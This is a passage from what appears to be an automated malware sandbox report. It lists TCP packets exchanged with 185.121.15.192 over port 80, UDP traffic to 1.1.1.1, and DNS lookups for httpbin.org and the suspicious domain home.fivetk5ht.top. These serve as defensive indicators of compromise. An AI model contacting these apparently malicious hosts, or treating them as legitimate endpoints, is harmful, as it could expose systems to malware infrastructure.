                                                    Dec 20, 2024 16:56:28.485728025 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.485794067 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.485795021 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.485855103 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.485866070 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.485869884 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.485939026 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.485953093 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.485996008 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.486052036 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487051964 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487078905 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487087965 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487112045 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487139940 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487160921 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487283945 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487294912 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487310886 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487325907 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487344027 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487371922 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487375021 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487399101 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487418890 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487447023 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487447977 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487483025 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487493992 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487695932 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487701893 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487714052 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487760067 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487782955 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487801075 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487853050 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.487962961 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.487973928 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488019943 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.488117933 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488127947 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488181114 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.488240004 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488291979 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.488297939 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488307953 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488318920 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488343000 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.488373041 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.488450050 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488460064 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488526106 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.488604069 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488614082 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488668919 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.488676071 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488687038 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488717079 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.488754034 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488764048 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488789082 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.488807917 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.488818884 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488828897 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.488878965 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.488971949 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489017010 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.489068031 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489111900 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489126921 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.489161968 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.489231110 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489248991 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489259005 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489275932 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.489291906 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.489303112 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.489331007 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489341021 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489379883 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.489442110 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489491940 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489617109 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489684105 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489752054 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489841938 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489949942 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489959955 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.489994049 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490004063 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490058899 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490070105 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490149021 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490159035 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490264893 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490274906 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490283966 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490386009 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490396023 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490405083 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490415096 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490432024 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490441084 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490452051 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490576029 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.490590096 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490607977 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490617990 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490645885 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490751028 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490793943 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490803957 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490843058 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490854025 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490909100 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.490919113 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.491010904 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.491019964 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.532067060 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.532210112 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.532428980 CET4970880192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.539071083 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.539100885 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.539196968 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.539225101 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.604912996 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.604928017 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605006933 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605015993 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605129957 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605139971 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605293989 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605312109 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605480909 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605490923 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605623007 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605632067 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605787039 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605797052 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605806112 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605983973 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.605993986 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606003046 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606036901 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606045961 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606070995 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606081009 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606276035 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606286049 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606425047 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606435061 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606445074 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606617928 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606626987 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606713057 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606723070 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606821060 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606829882 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606930017 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.606939077 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607023954 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607104063 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607168913 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607177973 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607276917 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607285976 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607382059 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607393980 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607440948 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607450008 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607614040 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607623100 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607763052 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607808113 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607871056 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607882023 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607942104 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.607950926 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608027935 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608037949 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608078003 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608089924 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608205080 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608213902 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608253956 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608338118 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608347893 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608356953 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608376026 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608385086 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608475924 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608484983 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608510017 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608565092 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608603001 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608612061 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608695984 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608705997 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608899117 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608908892 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608952999 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.608962059 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609102964 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609113932 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609222889 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609231949 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609302998 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609313011 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609395027 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609436035 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609569073 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609620094 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609744072 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609752893 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609833956 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609880924 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609899044 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609908104 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609925985 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.609935045 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610063076 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610071898 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610236883 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610279083 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610358953 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610368967 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610461950 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610471010 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610541105 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610551119 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610661030 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610769987 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610850096 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.610858917 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611021996 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611031055 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611176014 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611186028 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611392021 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611465931 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611645937 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611654997 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611685991 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611737967 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611777067 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611785889 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611855984 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611865997 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611979008 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.611989021 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612023115 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612153053 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612163067 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612175941 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612201929 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612211943 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612338066 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612346888 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612482071 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612492085 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612546921 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612555981 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612669945 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612682104 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612768888 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612776995 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612828016 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.612837076 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613054037 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613064051 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613147020 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613249063 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613318920 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613328934 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613426924 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613435984 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613481045 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613656044 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613666058 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613729000 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613786936 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.613796949 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.614049911 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.614104033 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.615489960 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.615550041 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.615717888 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.615727901 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.615957022 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.615967035 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.616036892 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.616096973 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.616106033 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.616117001 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.616156101 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.616204023 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.616244078 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.616267920 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.616363049 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.616373062 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.616439104 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.629108906 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.652045965 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.652153969 CET8049708185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.860060930 CET4970980192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.980051994 CET8049709185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:28.980134010 CET4970980192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:28.980463982 CET4970980192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:29.100652933 CET8049709185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:30.278642893 CET8049709185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:30.278820038 CET8049709185.121.15.192192.168.2.10
                                                    Dec 20, 2024 16:56:30.278888941 CET4970980192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:30.279176950 CET4970980192.168.2.10185.121.15.192
                                                    Dec 20, 2024 16:56:30.398783922 CET8049709185.121.15.192192.168.2.10

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 20, 2024 16:56:20.040221930 CET5866353192.168.2.101.1.1.1
                                                    Dec 20, 2024 16:56:20.040301085 CET5866353192.168.2.101.1.1.1
                                                    Dec 20, 2024 16:56:20.187673092 CET53586631.1.1.1192.168.2.10
                                                    Dec 20, 2024 16:56:20.331320047 CET53586631.1.1.1192.168.2.10
                                                    Dec 20, 2024 16:56:23.212332964 CET5866653192.168.2.101.1.1.1
                                                    Dec 20, 2024 16:56:23.212388992 CET5866653192.168.2.101.1.1.1
                                                    Dec 20, 2024 16:56:23.498558998 CET53586661.1.1.1192.168.2.10
                                                    Dec 20, 2024 16:56:23.626076937 CET53586661.1.1.1192.168.2.10
                                                    Dec 20, 2024 16:56:25.271193027 CET5866853192.168.2.101.1.1.1
                                                    Dec 20, 2024 16:56:25.271254063 CET5866853192.168.2.101.1.1.1
                                                    Dec 20, 2024 16:56:25.409362078 CET53586681.1.1.1192.168.2.10
                                                    Dec 20, 2024 16:56:25.409524918 CET53586681.1.1.1192.168.2.10
                                                    Dec 20, 2024 16:56:26.993113995 CET5503553192.168.2.101.1.1.1
                                                    Dec 20, 2024 16:56:26.993113995 CET5503553192.168.2.101.1.1.1
                                                    Dec 20, 2024 16:56:27.137717009 CET53550351.1.1.1192.168.2.10
                                                    Dec 20, 2024 16:56:27.137748957 CET53550351.1.1.1192.168.2.10
                                                    Dec 20, 2024 16:56:28.713457108 CET5503753192.168.2.101.1.1.1
                                                    Dec 20, 2024 16:56:28.713525057 CET5503753192.168.2.101.1.1.1
                                                    Dec 20, 2024 16:56:28.853854895 CET53550371.1.1.1192.168.2.10
                                                    Dec 20, 2024 16:56:28.853946924 CET53550371.1.1.1192.168.2.10

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 20, 2024 16:56:20.040221930 CET192.168.2.101.1.1.10xdb90Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                    Dec 20, 2024 16:56:20.040301085 CET192.168.2.101.1.1.10xf959Standard query (0)httpbin.org28IN (0x0001)false
                                                    Dec 20, 2024 16:56:23.212332964 CET192.168.2.101.1.1.10x477bStandard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
